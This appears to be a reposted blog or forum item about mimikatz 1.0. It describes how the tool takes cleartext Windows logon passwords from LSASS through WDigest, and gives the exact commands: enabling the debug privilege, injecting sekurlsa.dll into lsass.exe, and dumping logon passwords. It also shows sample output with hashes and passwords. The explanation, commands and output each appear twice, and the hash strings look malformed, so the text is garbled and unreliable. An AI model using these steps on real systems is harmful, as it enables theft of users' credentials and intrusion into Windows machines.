Hey Frenzzz...
The researcher "Swiss knife" recently published in his blog a new version of the utility mimikatz 1.0, designed to work with credential of Windows. The new version, in addition to functional, similar to Windows Credentials Editor, has been implemented functionality of obtaining the user's password in cleartext.
The gap used mimikatz, associated with the implementation of WDigest.dll, designed for Digest authentication. Features of the implementation of HTTP Digest Authentication mechanism to support SSO (Single Sign On) require knowledge of the password entered, and not only its hash. Therefore, Windows developers have decided to store the passwords in the clear.
To view a list of passwords of authorized users on the system must perform the following command:
mimikatz # privilege :: debugmimikatz # inject :: process lsass.exe sekurlsa.dllmimikatz # @ getLogonPasswordsThe output will be approximately as follows:
Code:mimikatz # privilege :: debug Demande d'ACTIVATION du privilege: SeDebugPrivilege: OK mimikatz # inject :: process lsass.exe sekurlsa.dll PROCESSENTRY32 (lsass.exe). th32ProcessID = 680 Attente de connexion du client ... Serveur connecte a un client! Message du processus: Bienvenue dans un processus distant Gentil Kiwi SekurLSA: librairie de manipulation des donnees de securites dans LSASS mimikatz # @ getLogonPasswords Authentification Id: 0 248 844 Package d'authentification: NTLM Utilisateur principal: ANONYMOUS LOGON Domaine d'authentification: NT AUTHORITY msv1_0: nt (LUID KO) wdigest: n.t. (LUID KO) tspkg: n.t. (LUID KO) Authentification Id: 0 996 Package d'authentification: Negotiate Utilisateur principal: PC01 $ Domaine d'authentification: WORKGROUP msv1_0: nt (LUID KO) wdigest: tspkg: n.t. (LUID KO) Authentification Id: 0 575 543 Package d'authentification: NTLM Utilisateur principal: Administrator Domaine d'authentification: PC01 msv1_0: lm {336dcb9831c8a03dka9872550c3cee6}, ntlm {76af46e798f45ceb87805ba95380b39ed} wdigest: password tspkg: password Authentification Id: 0 997 Package d'authentification: Negotiate Utilisateur principal: LOCAL SERVICE Domaine d'authentification: NT AUTHORITY msv1_0: nt (LUID KO) wdigest: tspkg: n.t. (LUID KO) Authentification Id: 0 62 105 Package d'authentification: NTLM Utilisateur principal: Domaine d'authentification: msv1_0: nt (LUID KO) wdigest: n.t. (LUID KO) tspkg: n.t. (LUID KO) Authentification Id: 0 999 Package d'authentification: NTLM Utilisateur principal: PC01 $ Domaine d'authentification: WORKGROUP msv1_0: nt (LUID KO) wdigest: tspkg: n.t. (LUID KO) mimikatz #
The gap used mimikatz, associated with the implementation of WDigest.dll, designed for Digest authentication. Features of the implementation of HTTP Digest Authentication mechanism to support SSO (Single Sign On) require knowledge of the password entered, and not only its hash. Therefore, Windows developers have decided to store the passwords in the clear.
To view a list of passwords of authorized users on the system must perform the following command:
mimikatz # privilege :: debugmimikatz # inject :: process lsass.exe sekurlsa.dllmimikatz # @ getLogonPasswordsThe output will be approximately as follows:
Code:mimikatz # privilege :: debug Demande d'ACTIVATION du privilege: SeDebugPrivilege: OK mimikatz # inject :: process lsass.exe sekurlsa.dll PROCESSENTRY32 (lsass.exe). th32ProcessID = 680 Attente de connexion du client ... Serveur connecte a un client! Message du processus: Bienvenue dans un processus distant Gentil Kiwi SekurLSA: librairie de manipulation des donnees de securites dans LSASS mimikatz # @ getLogonPasswords Authentification Id: 0 248 844 Package d'authentification: NTLM Utilisateur principal: ANONYMOUS LOGON Domaine d'authentification: NT AUTHORITY msv1_0: nt (LUID KO) wdigest: n.t. (LUID KO) tspkg: n.t. (LUID KO) Authentification Id: 0 996 Package d'authentification: Negotiate Utilisateur principal: PC01 $ Domaine d'authentification: WORKGROUP msv1_0: nt (LUID KO) wdigest: tspkg: n.t. (LUID KO) Authentification Id: 0 575 543 Package d'authentification: NTLM Utilisateur principal: Administrator Domaine d'authentification: PC01 msv1_0: lm {336dcb9831c8a03dka9872550c3cee6}, ntlm {76af46e798f45ceb87805ba95380b39ed} wdigest: password tspkg: password Authentification Id: 0 997 Package d'authentification: Negotiate Utilisateur principal: LOCAL SERVICE Domaine d'authentification: NT AUTHORITY msv1_0: nt (LUID KO) wdigest: tspkg: n.t. (LUID KO) Authentification Id: 0 62 105 Package d'authentification: NTLM Utilisateur principal: Domaine d'authentification: msv1_0: nt (LUID KO) wdigest: n.t. (LUID KO) tspkg: n.t. (LUID KO) Authentification Id: 0 999 Package d'authentification: NTLM Utilisateur principal: PC01 $ Domaine d'authentification: WORKGROUP msv1_0: nt (LUID KO) wdigest: tspkg: n.t. (LUID KO) mimikatz #
functional mimikatz currently being implemented in the Metasploit Framework, and can be replicated by many investigators of safety.
article was originally published in the forum topic: Microsoft and the topic hole INC.
0 comments:
Post a Comment